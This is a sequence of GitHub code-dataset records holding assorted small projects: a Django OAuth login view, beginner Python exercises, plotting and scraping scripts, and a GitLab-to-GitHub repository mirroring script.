input('Вы уверены? (Y/N): ').capitalize() == 'Y':\n if c.notes_exist():\n c.delete_all_notes()\n elif task == 7:\n print('Выходим из программы')\n exit()\n else:\n print('Ошибка. Введите от 1 до 7.')\n\n\ndef get_note_data():\n note_id = 0\n date = datetime.datetime.now()\n title = input('Введите новое имя заметки: ')\n text = input('Введите новый текст заметки: ')\n return Note(note_id, date, title, text)\n\n\ndef get_number():\n while True:\n get_choice = input('Введите id заметки: ')\n if get_choice.isdigit() and int(get_choice) > 0:\n return get_choice\n else:\n print('\\t\\t\\tВведено неверное id заметки!')","repo_name":"MaksFromGeek/ControlWork","sub_path":"NotesApp/Mechanisms/GearMenu.py","file_name":"GearMenu.py","file_ext":"py","file_size_in_byte":2780,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"70346947430","text":"import datetime\nimport logging\nfrom urllib.parse import urlparse\n\nfrom django.conf import settings\nfrom django.contrib.auth import get_user_model, login\nfrom django.core.exceptions import ObjectDoesNotExist\nfrom django.db import transaction\nfrom django.http import HttpResponseRedirect, HttpResponseForbidden\nfrom django.shortcuts import render, get_object_or_404\nfrom django.urls import reverse\nfrom django.views.generic import FormView\n\nfrom Blog.utils import get_current_site, get_md5\nfrom auth.authmanager import get_manager_by_type, AuthAccessTokenException\nfrom auth.forms import RequireEmailForm\nfrom auth.models import AuthUser\n\nlogger = logging.getLogger(__name__)\n\n# Create your views here.\ndef get_redirecturl(request):\n \"\"\"\n :param request:\n :return:\n \"\"\"\n nexturl = request.GET.get('next_url', None)\n if not nexturl or nexturl == '/login/' or nexturl == '/login':\n nexturl = '/'\n return nexturl\n p = urlparse(nexturl)\n if p.netloc:\n site = get_current_site().domain\n if not p.netloc.replace('www.', '') == site.replace('www.', ''):\n logger.info('非法的url:' + nexturl)\n return '/'\n return nexturl\n\n\ndef authlogin(request):\n \"\"\"\n :param request:\n :return:\n \"\"\"\n type = request.GET.get('type', None)\n if not type:\n return HttpResponseRedirect('/')\n manager = get_manager_by_type(type)\n if not manager:\n return HttpResponseRedirect('/')\n nexturl = get_redirecturl(request)\n authorizeurl = manager.get_authorization_url(nexturl)\n return HttpResponseRedirect(authorizeurl)\n\n\ndef authorize(request):\n \"\"\"\n :param request:\n 
:return:\n \"\"\"\n type = request.GET.get('type', None)\n if not type:\n return HttpResponseRedirect('/')\n manager = get_manager_by_type(type)\n if not manager:\n return HttpResponseRedirect('/')\n code = request.GET.get('code', None)\n try:\n resp = manager.get_access_token_by_code(code)\n except AuthAccessTokenException as e:\n logger.warning('AuthAccessTokenException:' + str(e))\n return HttpResponseRedirect('/')\n except Exception as e:\n logger.error(e)\n resp = None\n nexturl = get_redirecturl(request)\n if not resp:\n return HttpResponseRedirect(manager.get_authorization_url(nexturl))\n user = manager.get_auth_userinfo()\n if user:\n if not user.nickname or not user.nickname.strip():\n user.nickname = 'blog' + datetime.datetime.now().strftime('%y%m%d%H%M%S')\n try:\n temp = AuthUser.objects.get(type=type, openid=user.openid)\n temp.picture = user.picture\n temp.matedata = user.matedata\n temp.nickname = user.nickname\n user = temp\n except ObjectDoesNotExist:\n pass\n\n if type == 'facebook':\n user.token = ''\n if user.email:\n with transaction.atomic():\n author = None\n try:\n author = get_user_model().objects.get(id=user.author_id)\n except ObjectDoesNotExist:\n pass\n\n if not author:\n result = get_user_model().objects.get_or_create(email=user.email)\n author = result[0]\n if result[1]:\n try:\n get_user_model().objects.get(username=user.nickname)\n except ObjectDoesNotExist:\n author.username = user.nickname\n else:\n author.username = 'blog' + datetime.datetime.now().strftime('%y%m%d%H%M%S')\n author.source = 'authorize'\n author.save()\n user.author = author\n user.save()\n\n auth_user_login_signal.send(sender=authorize.__class__, id=user.id)\n login(request, author)\n return HttpResponseRedirect(nexturl)\n else:\n user.save()\n url = reverse('auth:require_email', kwargs={'authid': user.id})\n return HttpResponseRedirect(url)\n else:\n return HttpResponseRedirect(nexturl)\n\n\ndef emailconfirm(request, id, sign):\n \"\"\"\n :param request:\n :param id:\n :param sign:\n :return:\n \"\"\"\n if not sign:\n return HttpResponseForbidden()\n if not get_md5(settings.SECRET_KEY + str(id) + settings.SECRET_KEY).upper() == sign.upper():\n return HttpResponseForbidden()\n authuser = get_object_or_404(AuthUser, pk=id)\n with transaction.atomic():\n if authuser.author:\n author = get_user_model().objects.get(pk=authuser.author_id)\n else:\n result = get_user_model().objects.get_or_create(email=authuser.email)\n author = result[0]\n if result[1]:\n author.source = 'emailconfirm'\n author.username = authuser.nickname.strip() if authuser.nickname.strip() else 'bolg' + datetime.datetime.now().strftime('%y%m%d%H%M%S')\n author.save()\n authuser.author = author\n author.save()\n auth_user_login_signal.send(sender=emailconfirm.__class__, id=authuser.id)\n login(request, author)\n site = get_current_site().domain\n content = f'''\n
恭喜您, 您已经成功绑定您的邮箱,您可以使用{type}来直接免密码登录\n '''\n send_email(emailto=[authuser.email, ], title='恭喜您绑定成功!', content=content)\n url = reverse('auth:bindsuccess', kwargs={'authid': id})\n url = url + '?type=success'\n return HttpResponseRedirect(url)\n\n\nclass RequireEmailView(FormView):\n \"\"\"docstring\"\"\"\n form_class = RequireEmailForm\n template_name = 'auth/require_email.html'\n\n def get(self, request, *args, **kwargs):\n authid = self.kwargs['authid']\n authuser = get_object_or_404(AuthUser, pk=authid)\n if authuser.email:\n return HttpResponseRedirect('/')\n return super(RequireEmailView, self).get(request, *args, **kwargs)\n\n def get_initial(self):\n authid = self.kwargs['authid']\n return {\n 'email': '',\n 'authid': authid,\n }\n\n def get_context_data(self, **kwargs):\n authid = self.kwargs['authid']\n authuser = get_object_or_404(AuthUser, pk=authid)\n if authuser.picture:\n kwargs['picture'] = authuser.picture\n return super(RequireEmailView, self).get_context_data(**kwargs)\n\n def form_valid(self, form):\n email = form.cleaned_data['email']\n authid = form.cleaned_data['authid']\n authuser = get_object_or_404(AuthUser, pk=authid)\n authuser.email = email\n authuser.save()\n sign = get_md5(settings.SECRET_KEY + str(authuser.id) + settings.SECRET_KEY)\n site = get_current_site().domain\n\n if settings.DEBUG:\n site = '127.0.0.1:8000'\n path = reverse('auth: email_confirm', kwargs={'id': authid, 'sign': sign})\n url = 'http://{site}{path}'.format(site=site, path=path)\n\n content = \"\"\"\n {url}\n \"\"\".format(url=url)\n senf_email(emailto=[email, ], title='绑定您的电子邮箱', content=content)\n url = reverse('auth: bindsuccess', kwargs={'authid': authid})\n url = url + \"?type=email\"\n return HttpResponseRedirect(url)\n\n\ndef bindsuccess(request, authid):\n \"\"\"\n :param request:\n :param authid:\n :return:\n \"\"\"\n type = request.GET.get('type', None)\n authuser = get_object_or_404(AuthUser, pk=authid)\n if type == 'email':\n title = 'bind success'\n content = ''\n else:\n title = 'bind success'\n content = '{type}'.format(type=authuser.type)\n return render(request, 'auth/bindsuccess.html', {'title': title, 'content': content})","repo_name":"FreeGodCode/TYCarry_Blog","sub_path":"auth/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":7876,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"71"} +{"seq_id":"25657523267","text":"# Write a Python program to get the maximum and\r\n# minimum value in a dictionary.\r\n\r\ndef get_min_max_value(dic):\r\n dic1={}\r\n dic1=dic.copy()\r\n min1= min(dic1.values())\r\n max1= max(dic1.values())\r\n return min1,max1\r\n\r\ndic1={1:10, 2:20}\r\ndic2={3:30, 4:40}\r\ndic3={5:50,6:60}\r\ndic3.update(dic2)\r\nprint('dic3 is',dic3)\r\nprint(\r\n f'min , max value in dic3 are :',get_min_max_value(dic3)\r\n)\r\n\r\n\r\n# Write a Python program to remove \r\n# duplicates from Dictionary.\r\n\r\ndic={\r\n 1:10, \r\n 2:20 ,\r\n 3:30, \r\n 4:40 , \r\n 5:50,\r\n 6:60 ,\r\n 1:10, \r\n 2:20 ,\r\n 3:30\r\n}\r\n\r\nresult={}\r\n\r\nfor key,value in dic.items():\r\n if key not in result:\r\n result[key]=value\r\n\r\nprint('\\ndictionary without duplicates : ')\r\nprint( result )","repo_name":"Kailashmandal/Python-with-Kailash","sub_path":"practice21.py","file_name":"practice21.py","file_ext":"py","file_size_in_byte":756,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"18502986670","text":"import re\r\nintent_keywords = {\r\n 
'self':['your','you','yourself'],\r\n 'greet': ['hi','morning','hello','welcome','Hey','Nice to meet you'],\r\n 'time': ['time', 'clock'],\r\n 'date':['date','day','calendar','today'],\r\n \"search\":['search',\"when\",\"what\",\"why\",\"how\",\"who\",\"where\"],\r\n 'relax':[\"relax\"],\r\n 'location':['find','track'],\r\n 'close': ['close'],\r\n 'exit':['close','shut up','stop','exit']\r\n}\r\n\r\npatterns = {intent: re.compile('|'.join(keys)) for intent, keys in intent_keywords.items()}\r\n\r\ndef get_intent(message):\r\n intents=[]\r\n for intent, pattern in patterns.items():\r\n # Check if the pattern occurs in the message \r\n if pattern.search(message):\r\n intents.append(intent)\r\n if(len(intents)!=0):\r\n return intents\r\n else: \r\n return(['default']) \r\ndef ques_check(message):\r\n que = False\r\n for i in [\"when\",\"what\",\"why\",\"how\",\"who\",\"where\"]:\r\n if i in message:\r\n que = True\r\n return que","repo_name":"saai-sudarsanan-d/Alpha-v1","sub_path":"intent_keys.py","file_name":"intent_keys.py","file_ext":"py","file_size_in_byte":1000,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"12010348963","text":"\nimport matplotlib\n# Force matplotlib to not use any Xwindows backend.\nmatplotlib.use('Agg')\n\nfrom matplotlib.figure import Figure\nfrom matplotlib.patches import Polygon\nfrom matplotlib.backends.backend_agg import FigureCanvasAgg\nimport matplotlib.numerix as nx\n\nfigsize = (3,8)\ndpi = 80\n\nfrom matplotlib import mpl\nfig = Figure(figsize=figsize)\n \n#ax = fig.add_subplot(111)\n# Make a figure and axes with dimensions as desired.\n#fig = pyplot.figure(figsize=(8,3))\n#[left, bottom, width, height] \nax1 = fig.add_axes([0.05, 0.05, 0.15, 0.9])\nax2 = fig.add_axes([0.65, 0.05, 0.15, 0.9])\n\n# Set the colormap and norm to correspond to the data for which\n# the colorbar will be used.\ncmap = mpl.cm.cool\nnorm = mpl.colors.Normalize(vmin=5, vmax=10)\n\n# ColorbarBase derives from ScalarMappable and puts a colorbar\n# in a specified axes, so it has everything needed for a\n# standalone colorbar. There are many more kwargs, but the\n# following gives a basic continuous colorbar with ticks\n# and labels.\ncb1 = mpl.colorbar.ColorbarBase(ax1, cmap=cmap,\n norm=norm,\n orientation='vertical')\ncb1.set_label('Energies')\n\n# The second example illustrates the use of a ListedColormap, a\n# BoundaryNorm, and extended ends to show the \"over\" and \"under\"\n# value colors.\ncmap = mpl.colors.ListedColormap(['r', 'g', 'b', 'c'])\ncmap.set_over('0.25')\ncmap.set_under('0.75')\n\n# If a ListedColormap is used, the length of the bounds array must be\n# one greater than the length of the color list. 
The bounds must be\n# monotonically increasing.\nbounds = [1, 2, 4, 7, 8]\nnorm = mpl.colors.BoundaryNorm(bounds, cmap.N)\ncb2 = mpl.colorbar.ColorbarBase(ax2, cmap=cmap,\n norm=norm,\n # to use 'extend', you must\n # specify two extra boundaries:\n boundaries=[0]+bounds+[13],\n extend='both',\n ticks=bounds, # optional\n spacing='proportional',\n orientation='vertical')\ncb2.set_label('Discrete intervals, some other units')\n# Make the PNG\ncanvas = FigureCanvasAgg(fig)\n# The size * the dpi gives the final image size\n# a4\"x4\" image * 80 dpi ==> 320x320 pixel image\nfilename = \"/Users/ludo/mw_v_xlogp_ellipses.png\"\ncanvas.print_figure(filename, dpi=dpi)\n\n\nimport DejaVu\nDejaVu.enableVBO = False \nfrom DejaVu import Viewer\nvi = Viewer() \nfilename = \"/Users/ludo/mw_v_xlogp_ellipses.png\"\nfigsize = (3,8)\ndpi = 80\nimport upy\nhelper = upy.getHelperClass()(master=vi)\nplane = helper.plane(\"plotplane\",center=[0.,0.,0.],\n size=[dpi*figsize[0]/10.,dpi*figsize[1]/10.],\n subdivision=(1,1),axis=\"+Z\")#-Z c4d, Z maya\nmat = helper.createTexturedMaterial(\"plot\",filename)\nhelper.assignMaterial(plane,mat,texture=True)\n\n\n","repo_name":"corredD/upy","sub_path":"examples/testmatplotlib.py","file_name":"testmatplotlib.py","file_ext":"py","file_size_in_byte":2968,"program_lang":"python","lang":"en","doc_type":"code","stars":32,"dataset":"github-code","pt":"71"} +{"seq_id":"33055803274","text":"from .common import BeautifulSoup, to_csv, to_img\nfrom . import head, env\n\n\nclass Extractor:\n def __init__(self, auth):\n self.auth = auth\n\n def jadwal(self):\n res = self.auth.s.get(f\"{env['BASE_URL']}/{env['COURSE_URL']}\", headers=head)\n soup = BeautifulSoup(res.content, \"html.parser\")\n table = soup.find_all('table', class_='table table-hover table-striped')\n table = table[1]\n data = []\n rows = table.find_all('tr')[1:] \n for row in rows:\n columns = row.find_all('td')\n no = columns[0].text.strip().rstrip('.')\n hari_waktu = ' '.join(columns[1].text.split()).strip()\n kelas_ruangan = ' '.join(columns[2].text.split()).strip()\n mata_kuliah = ' '.join(columns[3].text.split()[1:]).strip()\n dosen = columns[4].text.strip()\n\n data.append({\n 'No': no,\n 'Hari & Waktu': hari_waktu,\n 'Kelas & Ruangan': kelas_ruangan,\n 'Mata Kuliah': mata_kuliah,\n 'Dosen Pengampuh': dosen\n })\n\n to_csv(data, \"jadwal.csv\")\n # to_img(\"jadwal.csv\", \"jadwal.png\")\n return True","repo_name":"rizmulya/mycic-absen","sub_path":"cic_portal/extractor.py","file_name":"extractor.py","file_ext":"py","file_size_in_byte":1199,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"8403771723","text":"#from mpl_toolkits.mplot3d import Axes3D\n#import matplotlib.pyplot as plt\nfrom math import *\nimport numpy as np \n\n\n\ndef main():\n \n \n eta = 0.00001\n iter = 10000\n #for j in range(1,8):\n \t#eta = eta*10\n \t#print(minimize_loss([-6,-6],eta, iter), eta, [ -6, -6]) #Task 1_2 \t\n print(minimize_loss([-6,-6],eta, iter), eta) #Task 1_2 \t\n return\n\n\n\ndef minimize_loss(w, eta,iter):\n\t#want to test all possible values of w[-6,-6]; update w_i\n\t# and minimize L_simple\n\t\n\tw_old = w\n\tvalue_arr = []\n\tfor i in range(1,iter):\n\t\tw_new = w_old - np.array([eta, eta])*d_L_simple([w_old[0], w_old[1]])\n\t\tw_old = w_new\n\t\tL_simpleval= L_simple([w_new[0],w_new[1]])\n\t\tvalue_arr.append(L_simpleval)\n\t\tif min(value_arr) == L_simpleval:\n\t\t\tw_minimize = [w_new[0], w_new[1]]\n\tplotL_simple(eta, value_arr)\n\treturn w_minimize\n\ndef 
logistic(w,x): \n return 1.0/(1.0+np.exp(-np.inner(w,x)))\n\ndef d_logistic(w,x,derivative):\n if derivative == 1:\n return x[0] * np.exp(-np.inner(w,x))*logistic(w, x)*logistic(w, x)\n if derivative == 2:\n return x[1] * np.exp(-np.inner(w,x))*logistic(w, x)*logistic(w, x)\n\ndef L_simple(w):\n return np.power(logistic(w, [1, 0]) -1, 2) + np.power(logistic(w, [0, 1]), 2) + np.power(logistic(w, [1, 1]) -1, 2)\n\ndef d_L_simple(w):\n #derivate of L_simple \n first_w1 = (logistic(w, [1, 0]) -1) * 2 * d_logistic(w, [1, 0], 1) \n second_w1 = (logistic(w, [0, 1])) * 2 * d_logistic(w, [0, 1], 1) \n third_w1 = (logistic(w, [1, 1]) -1) * 2 * d_logistic(w, [1, 1], 1) \n\n first_w2 = (logistic(w, [1, 0]) -1) * 2 * d_logistic(w, [1, 0], 2) \n second_w2 = (logistic(w, [0, 1])) * 2 * d_logistic(w, [0, 1], 2) \n third_w2 = (logistic(w, [1, 1]) -1) * 2 * d_logistic(w, [1, 1], 2) \n return [first_w1 + second_w1 + third_w1, first_w2 + second_w2 + third_w2]\n\ndef plotL_simple(eta, val_arr):\n\tfig = plt.figure() \n\tax = fig.gca(projection='3d')\n\n\t# Plot a sin curve using the x and y axes.\n\tx = np.linspace(0, 1, 100)\n\ty = np.sin(x * 2 * np.pi) / 2 + 0.5\n\tax.plot(x, y, zs=0, zdir='z', label='curve in (x,y)')\n\treturn\n\n\n\n\n\n\n\n\nif __name__== \"__main__\":\n main()\n\n","repo_name":"krislands/AI_oving4","sub_path":"AI_oving4/ai_4_testmedhenningsverdier.py","file_name":"ai_4_testmedhenningsverdier.py","file_ext":"py","file_size_in_byte":2102,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"9053153771","text":"# -*-coding: UTF-8 -*-\n#!/usr/bin/python\nnumero=int(input( \"Digame cuantas palabras tiene la lista: \"))\ncont = 0\nlista = []\nwhile cont < numero:\n print(\"Digame la palabra\", str(cont + 1) + \": \")\n nombre=input()\n lista+=[nombre]\n cont=cont+1\nprint(\"La lista creada es: \",lista)\nbuscar=str(input(\"Palabra a eliminar: \"))\nfor i in range(len(lista)-1, -1, -1):\n if lista[i] == buscar:\n del(lista[i])\n \nprint(\"La lista es ahora: \",lista)\n","repo_name":"JoanJSimpson/DesarrolloInterfaces","sub_path":"1a Evaluacion/Tema 1/Practicas/Ejercicio 1/Lista4.py","file_name":"Lista4.py","file_ext":"py","file_size_in_byte":462,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"86284543719","text":"# Licensed under a 3-clause BSD style license - see LICENSE.rst\n\nimport sofia_redux.instruments.forcast.configuration as dripconfig\nfrom sofia_redux.instruments.forcast.setpar import setpar\n\n\nclass TestSetpar(object):\n\n def test_badparname(self, capsys):\n setpar(None, 'ok value')\n capt = capsys.readouterr()\n assert 'invalid parname' in capt.err\n\n def test_badvalue(self, capsys):\n setpar('foo', None)\n capt = capsys.readouterr()\n assert 'invalid parameter value' in capt.err\n\n def test_load_config(self):\n dripconfig.configuration = None\n setpar('foo', 'bar')\n assert dripconfig.configuration['foo'] == 'bar'\n\n def test_setpar(self):\n dripconfig.load()\n assert 'foo' not in dripconfig.configuration\n setpar('foo', 'bar')\n assert dripconfig.configuration['foo'] == 'bar'\n","repo_name":"SOFIA-USRA/sofia_redux","sub_path":"sofia_redux/instruments/forcast/tests/test_setpar.py","file_name":"test_setpar.py","file_ext":"py","file_size_in_byte":875,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"71"} +{"seq_id":"31836418213","text":"from tensorflow import keras\nimport pickle\nimport tensorflow as 
tf\n\n\ntest_data = pickle.load(open('data/test_data.pkl', 'rb'))\ntest_labels = pickle.load(open('data/test_labels.pkl', 'rb'))\n\nnew_model = keras.models.load_model('model/1.h5')\nnew_model.summary()\n\nnew_model.compile(optimizer=tf.train.AdamOptimizer(),\n loss='binary_crossentropy',\n metrics=['accuracy'])\n\nloss, acc = new_model.evaluate(test_data, test_labels)\nprint(\"Restored model, accuracy: {:5.2f}%\".format(100*acc))\n","repo_name":"sunsyw/nlp","sub_path":"tf_classify/evaluate.py","file_name":"evaluate.py","file_ext":"py","file_size_in_byte":517,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"71"} +{"seq_id":"6943828109","text":"import requests\nimport json\nimport csv\nimport time\n\ndef does_github_repo_exist(access_token,org_name,repo_name):\n payload={}\n url = \"https://api.github.com/repos/\"+org_name+\"/\"+repo_name\n headers = {\n 'Accept': 'application/vnd.github.v3+json',\n 'Authorization': 'token '+access_token\n }\n response = requests.request(\"GET\", url, headers=headers, data=payload)\n if response.status_code == 200:\n return True\n else:\n return False\n\ndef read_csv_file(data_file):\n return_array = []\n with open(data_file, mode='r') as csv_file:\n csv_reader = csv.DictReader(csv_file)\n line_count = 0\n for row in csv_reader:\n if line_count == 0:\n line_count=line_count+1\n return_array.append(row)\n line_count = line_count+1\n return return_array\n\ndef add_remote(github_access_token, gitlab_access_token, mirror_object, github_username):\n url=\"https://gitlab.com/api/v4/projects/\"+mirror_object['GitLab Project ID']+\"/remote_mirrors?enabled=true\"\n payload = {\n \"url\":\"https://\"+github_username+\":\"+github_access_token+\"@github.com/\"+mirror_object['GitHub Org']+\"/\"+mirror_object['GitLab Project Name']+\".git\"\n }\n headers = {\n 'Private-Token': gitlab_access_token,\n }\n response = requests.request(\"POST\", url, headers=headers, data=payload)\n\n if response.status_code >=200 and response.status_code<300:\n return True\n else:\n print(\"Failed to map - \"+str(response.status_code))\n print(\"Response is \"+str(response.text))\n return False\n\ndef create_github_repo(github_access_token,mirror_object):\n url=\"https://api.github.com/orgs/\"+mirror_object['GitHub Org']+\"/repos\"\n #print(url)\n payload={}\n payload={\n \"name\":mirror_object['GitLab Project Name'],\n \"private\":\"true\"\n }\n headers = {\n 'Accept': 'application/vnd.github.v3+json',\n 'Authorization': 'token '+github_access_token\n }\n response = requests.request(\"POST\", url, headers=headers, json=payload)\n if response.status_code >= 200 or response.status_code<300:\n return True\n else:\n return False\n\ndef does_gitlab_mirror_exist(gitlab_access_token,mirror_object,github_username):\n url = \"https://gitlab.com/api/v4/projects/\"+mirror_object['GitLab Project ID']+\"/remote_mirrors\"\n payload={}\n headers = {\n 'Private-Token': gitlab_access_token,\n }\n github_repo = mirror_object['GitHub Org']+\"/\"+mirror_object['GitLab Project Name']+\".git\"\n response = requests.request(\"GET\", url, headers=headers, data=payload)\n if response.status_code == 200:\n response_dict = json.loads(response.text)\n for i in response_dict:\n if github_repo.lower() in i['url'].lower() and i['enabled']:\n return True\n else:\n return False\n else:\n print(\"DEBUG: Error getting remote mirror details\"+str)\n\ncreds = read_csv_file(\"tokens.csv\").pop(0)\ngitlab_access_token = creds['GitLab Access Token']\ngithub_access_token = creds['GitHub 
Access Token']\ngithub_username = creds['GitHub Username']\ndata_objects=read_csv_file(\"data_file.csv\")\nfor i in data_objects:\n if does_github_repo_exist(github_access_token,i['GitHub Org'],i['GitLab Project Name']):\n i['GitHub exists'] = True\n i['repo-created'] = False\n if not does_gitlab_mirror_exist(gitlab_access_token,i,github_username):\n if add_remote(github_access_token,gitlab_access_token,i,github_username):\n i['add-remote'] = True\n print(\"Successfully added mapping for \"+str(i['GitLab Group Name'])+\"/\"+str(i['GitLab Project Name'])+\"---> GitHub:\"+str(i['GitHub Org'])+\"/\"+str(i['GitLab Project Name']))\n else:\n i['add-remote'] = False\n print(\"FAILED TO MAP - \"+str(i['GitLab Group Name'])+\"/\"+str(i['GitLab Project Name'])+\"---> GitHub:\"+str(i['GitHub Org'])+\"/\"+str(i['GitLab Project Name']))\n else:\n i['add-remote'] = \"Existed\"\n print(\"Mapping of GitLab: \"+str(i['GitLab Group Name'])+\"/\"+str(i['GitLab Project Name'])+\"---> GitHub:\"+str(i['GitHub Org'])+\"/\"+str(i['GitLab Project Name'])+\" already exists! Skipping this!\")\n else:\n i['GitHub exists'] = False\n if create_github_repo(github_access_token,i):\n #time.sleep(5)\n i['repo-created'] = True\n if add_remote(github_access_token,gitlab_access_token,i,github_username):\n i['add-remote'] = True\n print(\"Successfully added mapping for \"+str(i['GitLab Group Name'])+\"/\"+str(i['GitLab Project Name'])+\"---> GitHub:\"+str(i['GitHub Org'])+\"/\"+str(i['GitLab Project Name']))\n else:\n i['add-remote'] = False\n print(\"FAILED TO MAP - \"+str(i['GitLab Group Name'])+\"/\"+str(i['GitLab Project Name'])+\"---> GitHub:\"+str(i['GitHub Org'])+\"/\"+str(i['GitLab Project Name']))\n else:\n i['repo-created'] = False\n print(\"DEBUG: Error in creating the repo. Check the data_file.csv\")\n\n#Generate Mirroring report\nwith open('mirror_setup_details.csv', mode='w') as data_file: \n data_writer = csv.writer(data_file, delimiter=',', quotechar='\"', quoting=csv.QUOTE_MINIMAL)\n data_writer.writerow(\n [\n 'GitLab Group ID', \n 'GitLab Group Name', \n 'GitLab Project ID', \n 'GitLab Project Name', \n 'GitHub Org', \n 'GitHub exists', \n 'repo-created', \n 'add-remote'\n ])\n\n for i in data_objects:\n data_writer.writerow(\n [\n i['GitLab Group ID'], \n i['GitLab Group Name'], \n i['GitLab Project ID'], \n i['GitLab Project Name'], \n i['GitHub Org'], \n i['GitHub exists'], \n i['repo-created'], \n i['add-remote']\n ])","repo_name":"sandesh2026/GitLab_mirroring_Python","sub_path":"2_mirror_setup.py","file_name":"2_mirror_setup.py","file_ext":"py","file_size_in_byte":6005,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"27757321041","text":"with open('inputs/input-15.txt') as file:\n raw = file.read()\n\ndata = [int(i) for i in raw.split(',')]\n\ndef play(init: list[int], turns: int):\n \"\"\"\n Plays the memory game. 
Needs the init numbers and how many turns to play.\n \"\"\"\n hist = {k:i+1 for i,k in enumerate(init[:-1])} # number:last_turn (+1 for indexing)\n last = init[-1]\n \n for turn in range(len(init),turns):\n if last in hist:\n current = turn-hist[last]\n else:\n current = 0\n \n hist[last] = turn\n last = current\n \n return last\n\nprint(play(data,2020))\nprint(play(data,30000000))\n","repo_name":"thesadru/advent-of-code-2020","sub_path":"challenges/day-15.py","file_name":"day-15.py","file_ext":"py","file_size_in_byte":623,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"71"} +{"seq_id":"41027265979","text":"#!/usr/bin/env python\n'''code description'''\n# pylint: disable = I0011, E0401, C0103, C0321\n\nclass Solution(object):\n '''Solution description'''\n def func(self, m, n, k):\n '''Solution function description'''\n res = []\n self.helper(res, [], 0, 0, 0, 0, 0, 0, m, n, k)\n return res\n def helper(self, total, part, counter1, counter2, counter3, round, square, flower, m, n, k):\n if counter1 < 0 or counter2 < 0 or counter3 < 0: return\n if counter1 > m or counter2 > n or counter3 > k: return\n if round > m or square > n or flower > k: return\n if part and len(part) > (m + n + k) * 2: return\n if part and len(part) == (m + n + k) * 2 and counter1 == 0 and counter2 == 0 and counter3 == 0 and\\\n round == m and square == n and flower == k:\n total.append(part)\n return\n self.helper(total, part+['('], counter1+1, counter2, counter3, round, square, flower, m, n, k)\n self.helper(total, part+[')'], counter1-1, counter2, counter3, round+1, square, flower, m, n, k)\n self.helper(total, part+['['], counter1, counter2+1, counter3, round, square, flower, m, n, k)\n self.helper(total, part+[']'], counter1, counter2-1, counter3, round, square+1, flower, m, n, k)\n self.helper(total, part+['{'], counter1, counter2, counter3+1, round, square, flower, m, n, k)\n self.helper(total, part+['}'], counter1, counter2, counter3-1, round, square, flower+1, m, n, k)\n\ndef main():\n '''main function'''\n _solution = Solution()\n inp = [(1, 1, 1)]\n for i in inp:\n for r in _solution.func(i[0], i[1], i[2]):\n print(r)\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"cerebrumaize/leetcode","sub_path":"generate.multi.parentheses/1.py","file_name":"1.py","file_ext":"py","file_size_in_byte":1703,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"6702699013","text":"# This file is part of vcc.py.\n\n# vcc.py is free software: you can redistribute it and/or modify it under the terms of the GNU General \n# Public License as published by the Free Software Foundation, either version 3 of the License, or (at \n# your option) any later version.\n\n# vcc.py is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the \n# implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public \n# License for more details.\n\n# You should have received a copy of the GNU General Public License along with vcc.py. If not, see \n# . 
\n\n\nfrom pathlib import Path\nfrom typing import Any\nimport yaml\n\nfrom .readconf import parse\n\nclass Configs:\n def __init__(self) -> None:\n readconf_config_path = Path.home() / \".vcc-config\"\n yaml_config_path = Path.home() / \".vcc-config.yaml\"\n if readconf_config_path.exists():\n config_text = readconf_config_path.read_bytes().decode(errors=\"ignore\")\n self.config: dict[str, Any] = parse(config_text)\n else:\n config_text = yaml_config_path.read_bytes().decode(errors=\"ignore\")\n self.config = yaml.safe_load(config_text)\n plugins: str | list[str] = self.config.get(\"plugins\", \"\")\n if isinstance(plugins, str):\n self.plugin_list = plugins.split(\" \")\n else:\n self.plugin_list = plugins\n\n","repo_name":"3swordman/vcc.py","sub_path":"vcc_py/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":1447,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"71"} +{"seq_id":"25851824565","text":"##### Introduction\n# This Python file takes the array that we organized in the previous \n# FCS_to_Array Python file to a .csv file for the logistic regression in R.\n\n##### Loading modules\nimport pickle\nimport openpyxl\n\n##### Loading data\nallData = pickle.load(open(\"allData.obj\", \"rb\"))\ncytof_files = allData[\"cytof_files\"]\nexpr_list = allData[\"expr_list\"]\n(_, n_cells, _, _) = expr_list.shape\nmarker_names = allData[\"marker_names\"]\nmarker_names.remove(\"Time\")\n\n##### Preparing .csv file\nwb = openpyxl.Workbook()\ndest_filename = \"data_unt_dox.csv\"\nws1 = wb.active\n\n##### Writing header into .csv file\nfor col in range(len(marker_names)):\n col = col + 1 # Starts at 1 and not 0\n _ = ws1.cell(column = col, row = 1, value = marker_names[col-1])\n_ = ws1.cell(column = col + 1, row = 1, value = \"dox_status\")\n\n##### Writing data into .csv file\nfor i in range(len(expr_list)):\n if (cytof_files[\"DOX_Ab\"][i]): dox_status = 1\n else: dox_status = 0\n for j in range(len(expr_list[0])):\n for k in range(len(expr_list[0][0])):\n col = k + 1 # Starts at 1 and not 0\n row = i*n_cells + j + 2 # Also starts at 1 and 1 more for header\n # print(i)\n # print(j)\n # print(k)\n _ = ws1.cell(column = col, row = row, value = expr_list[i][j][k][0])\n _ = ws1.cell(column = col + 1, row = row, value = dox_status)\n\nwb.save(filename = 